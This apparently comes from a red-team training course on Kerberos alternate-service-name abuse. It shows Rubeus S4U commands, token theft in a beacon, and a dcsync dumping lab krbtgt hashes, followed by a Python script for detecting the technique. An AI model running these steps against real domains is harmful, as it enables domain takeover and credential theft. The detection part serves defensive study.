The CIFS service can be leveraged for listing and transferring files, but what if port 445 were unavailable, or we wanted another option for lateral movement?
In the Kerberos authentication protocol, a service validates an inbound ticket by ensuring that it's encrypted with that service's symmetric key. This key is derived from the password hash of the principal running the service. Most services run in the SYSTEM context of a computer account, e.g. SQL-2$. Therefore, all service tickets for that host, whether for CIFS, TIME, HOST, etc., will be encrypted with the same key. The SPN does not factor into ticket validation.
Furthermore, the SPN information in the ticket (i.e. the sname field) is not encrypted and can be changed arbitrarily. That means we can request a service ticket for a service, such as CIFS, but then modify the SPN to something different, such as LDAP, and the target service will accept it happily.
This was originally discovered by Alberto Solino and confirmed as "by design" by Microsoft.
We can abuse this using the /altservice flag in Rubeus. In this example, I'm using the same TGT for SQL-2 to request a TGS for LDAP instead of CIFS.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap
[*] Action: S4U
[*] Building S4U2self request for: 'SQL-2$@DEV.CYBERBOTIC.IO'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2self request to 10.10.122.10:88
[+] S4U2self success!
[*] Got a TGS for 'nlamb' to 'SQL-2$@DEV.CYBERBOTIC.IO'
[*] base64(ticket.kirbi):
doIFnD[...]FMLTIk
[*] Impersonating user 'nlamb' to target SPN 'cifs/dc-2.dev.cyberbotic.io'
[*] Final ticket will be for the alternate service 'ldap'
[*] Building S4U2proxy request for service: 'cifs/dc-2.dev.cyberbotic.io'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Sending S4U2proxy request to domain controller 10.10.122.10:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'ldap'
[*] base64(ticket.kirbi) for SPN 'ldap/dc-2.dev.cyberbotic.io':
doIGaD[...]ljLmlv
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv
[*] Using DEV\nlamb:FakePass
[*] Showing process : False
[*] Username : nlamb
[*] Domain : DEV
[*] Password : FakePass
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2580
[+] Ticket successfully imported!
[+] LUID : 0x4b328e
beacon> steal_token 2580
Against a domain controller, the LDAP service allows us to perform a dcsync.
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 8/15/2022 4:01:04 PM
Object Security ID : S-1-5-21-569305411-121244042-2357301523-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
lm - 0: 207d5e08551c51892309c0cf652c353b
* Primary:Kerberos-Newer-Keys *
Default Salt : DEV.CYBERBOTIC.IOkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
aes128_hmac (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
des_cbc_md5 (4096) : 629189372a372fda
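From the detection side, the important consequence of the alternate service name trick is that the DC's 4769 event records the SPN that was requested (cifs/dc-2), not the one the ticket was later presented as (ldap), so filtering on "ldap" SPNs misses it. The following Python is an added example, not from the course page or from Rubeus: it correlates a delegated ticket for a DC service with a subsequent replication (4662 carrying the DS-Replication-Get-Changes rights) by the impersonated user. The event dicts, field names and DC_HOSTS set are assumptions modelled on Windows Security log fields; the sample events are constructed.

```python
from datetime import datetime, timedelta

# Control-access-right GUIDs DCSync needs; they show up in a 4662 event's Properties
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
DC_HOSTS = {"dc-2"}  # assumption: short hostnames of the domain controllers

def is_delegated_dc_ticket(ev):
    """4769 for a DC service obtained via S4U2proxy: Transited Services names the
    delegating account. The SPN logged is the one requested (cifs/...), never the
    substituted one, so the service part must not be used as a filter."""
    if ev["id"] != 4769 or not ev.get("TransitedServices"):
        return False
    host = ev["ServiceName"].split("/", 1)[-1].split(".", 1)[0].lower()
    return host in DC_HOSTS

def is_replication(ev):
    return ev["id"] == 4662 and bool(REPL_RIGHTS & set(ev.get("Properties", [])))

def find_delegated_dcsync(events, window=timedelta(minutes=10)):
    """Pair each delegated DC ticket with a replication by the impersonated user
    inside the window. Returns (delegating account, impersonated user) tuples."""
    hits = []
    for t in (e for e in events if is_delegated_dc_ticket(e)):
        user = t["AccountName"].split("@")[0].lower()
        for r in events:
            if (is_replication(r) and r["SubjectUserName"].lower() == user
                    and t["time"] <= r["time"] <= t["time"] + window):
                hits.append((t["TransitedServices"], user))
    return hits

# Constructed sample events modelled on the scenario above (not real log data)
T0 = datetime(2022, 8, 15, 16, 20, 0)
SAMPLE_EVENTS = [
    # ordinary ticket for a file server, no delegation involved
    {"id": 4769, "time": T0, "AccountName": "nlamb@DEV.CYBERBOTIC.IO",
     "ServiceName": "cifs/fs-1.dev.cyberbotic.io", "TransitedServices": ""},
    # S4U2proxy by sql-2$ for cifs/dc-2 on behalf of nlamb (later presented as ldap)
    {"id": 4769, "time": T0 + timedelta(minutes=1), "AccountName": "nlamb@DEV.CYBERBOTIC.IO",
     "ServiceName": "cifs/dc-2.dev.cyberbotic.io", "TransitedServices": "sql-2$@DEV.CYBERBOTIC.IO"},
    # replication rights exercised on the DC by the impersonated user
    {"id": 4662, "time": T0 + timedelta(minutes=2), "SubjectUserName": "nlamb",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
]

if __name__ == "__main__":
    for delegator, user in find_delegated_dcsync(SAMPLE_EVENTS):
        print(f"delegated DC ticket from {delegator} used for replication as {user}")
```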